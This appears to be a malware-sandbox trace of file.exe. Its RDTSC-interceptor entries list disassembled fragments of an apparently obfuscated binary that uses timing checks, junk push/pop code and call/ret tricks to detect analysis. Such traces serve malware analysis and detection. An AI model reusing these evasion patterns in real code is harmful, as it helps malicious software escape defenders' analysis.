Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B659B second address: 10B65A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B65A6 second address: 10B65B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF1610B867Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B673B second address: 10B673F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B688D second address: 10B68A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8683h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B68A4 second address: 10B68AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B68AA second address: 10B68AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6F35 second address: 10B6F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6F44 second address: 10B6F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6F4A second address: 10B6F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D070Bh 0x00000009 je 00007FF1610D0706h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6F5F second address: 10B6F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6F63 second address: 10B6F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF1610D071Bh 0x0000000c jns 00007FF1610D0706h 0x00000012 jmp 00007FF1610D070Fh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AAADF second address: 10AAAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AAAE6 second address: 10AAB16 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF1610D070Ch 0x00000008 jnp 00007FF1610D0706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF1610D0710h 0x00000017 push ebx 0x00000018 jng 00007FF1610D0706h 0x0000001e jnp 00007FF1610D0706h 0x00000024 pop ebx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7E23 second address: 10B7E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7E28 second address: 10B7E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7E2E second address: 10B7E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB72B second address: 10BB763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FF1610D0713h 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007FF1610D0716h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB763 second address: 10BB782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007FF1610B867Dh 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB782 second address: 10BB788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB788 second address: 10BB78C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B9F82 second address: 10B9F8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB896 second address: 10BB89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB89A second address: 10BB89E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB89E second address: 10BB8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB8A4 second address: 10BB8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D0714h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB8BC second address: 10BB8D6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FF1610B867Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB8D6 second address: 10BB8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB8DA second address: 10BB900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8684h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007FF1610B8676h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB900 second address: 10BB91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D0717h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084C4F second address: 1084C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084C54 second address: 1084C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FF1610D0706h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF1610D0710h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C4CD5 second address: 10C4CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C459F second address: 10C45A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C45A3 second address: 10C45AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C45AB second address: 10C45C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1610D0718h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6FE1 second address: 10C6FE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C71CB second address: 10C71CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7350 second address: 10C7354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7822 second address: 10C7837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7837 second address: 10C783D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C783D second address: 10C7841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7C7A second address: 10C7C9B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF1610B867Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF1610B867Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8E83 second address: 10C8E9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C8E9E second address: 10C8EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CA6E0 second address: 10CA6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CA6E4 second address: 10CA6EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CD9FD second address: 10CDA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CEB0A second address: 10CEB14 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF1610B867Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D2ED2 second address: 10D2ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D2ED7 second address: 10D2EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D2EDD second address: 10D2EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D2093 second address: 10D209D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF1610B8676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D209D second address: 10D20A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D20A1 second address: 10D210B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+12461306h], eax 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov edi, dword ptr [ebp+122D2C42h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov di, 112Ch 0x00000027 mov eax, dword ptr [ebp+122D14C9h] 0x0000002d add edi, 2610CBC0h 0x00000033 push FFFFFFFFh 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FF1610B8678h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f add dword ptr [ebp+122D3884h], esi 0x00000055 push eax 0x00000056 jc 00007FF1610B8680h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D4E78 second address: 10D4E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D4E7E second address: 10D4E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D4E83 second address: 10D4E88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D4F17 second address: 10D4F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D5E81 second address: 10D5E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D5E87 second address: 10D5EC0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF1610B8687h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub ebx, dword ptr [ebp+122D29E2h] 0x00000013 push 00000000h 0x00000015 xor bx, A592h 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D24EEh], esi 0x00000022 xchg eax, esi 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7EA1 second address: 10D7EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D60CF second address: 10D60DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF1610B8676h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7EA9 second address: 10D7EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FF1610D0706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108D56B second address: 108D56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D9501 second address: 10D9506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D9506 second address: 10D951F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FF1610B8684h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D951F second address: 10D9523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D864C second address: 10D8656 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF1610B867Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D8656 second address: 10D86F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 jg 00007FF1610D070Ch 0x0000000e pop ebx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FF1610D0708h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D1AE9h] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 push edi 0x00000038 pop ebx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push edx 0x00000041 pop edi 0x00000042 mov eax, dword ptr [ebp+122D1585h] 0x00000048 mov bx, cx 0x0000004b jmp 00007FF1610D070Eh 0x00000050 push FFFFFFFFh 0x00000052 call 00007FF1610D0716h 0x00000057 mov edi, dword ptr [ebp+122D1DD5h] 0x0000005d pop edi 0x0000005e nop 0x0000005f jng 00007FF1610D070Eh 0x00000065 je 00007FF1610D0708h 0x0000006b push eax 0x0000006c pop eax 0x0000006d push eax 0x0000006e jbe 00007FF1610D070Eh 0x00000074 push ebx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D9725 second address: 10D9729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DA6DA second address: 10DA6E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DA6E7 second address: 10DA766 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF1610B8678h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr [ebp+122D1EB2h], edi 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 movzx edi, bx 0x00000039 mov eax, dword ptr [ebp+122D163Dh] 0x0000003f mov edi, dword ptr [ebp+122D2B76h] 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007FF1610B8678h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 sub ebx, dword ptr [ebp+124511C0h] 0x00000067 nop 0x00000068 jo 00007FF1610B867Eh 0x0000006e push ebx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC251 second address: 10DC255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC255 second address: 10DC260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC260 second address: 10DC295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jng 00007FF1610D070Ch 0x0000000d add ebx, dword ptr [ebp+122D18A8h] 0x00000013 pushad 0x00000014 mov ax, 11B3h 0x00000018 mov eax, dword ptr [ebp+1244EE83h] 0x0000001e popad 0x0000001f push 00000000h 0x00000021 sub di, 3F99h 0x00000026 push 00000000h 0x00000028 adc ebx, 5DB431C4h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push ecx 0x00000032 push edx 0x00000033 pop edx 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DD2E7 second address: 10DD306 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF1610B8682h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE2C8 second address: 10DE31A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FF1610D0706h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cmc 0x00000010 push 00000000h 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF1610D0708h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f jmp 00007FF1610D0717h 0x00000034 xchg eax, esi 0x00000035 push ebx 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE31A second address: 10DE326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE326 second address: 10DE32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE32A second address: 10DE334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE334 second address: 10DE338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DB513 second address: 10DB51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DB51A second address: 10DB52A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D070Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DF301 second address: 10DF307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DB5F3 second address: 10DB5FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DF307 second address: 10DF379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF1610B8678h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 sub di, 64F5h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FF1610B8678h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 movsx ebx, cx 0x00000049 push 00000000h 0x0000004b mov edi, esi 0x0000004d or ebx, 4B395494h 0x00000053 push eax 0x00000054 pushad 0x00000055 pushad 0x00000056 push edi 0x00000057 pop edi 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b jp 00007FF1610B867Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E13B6 second address: 10E13BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
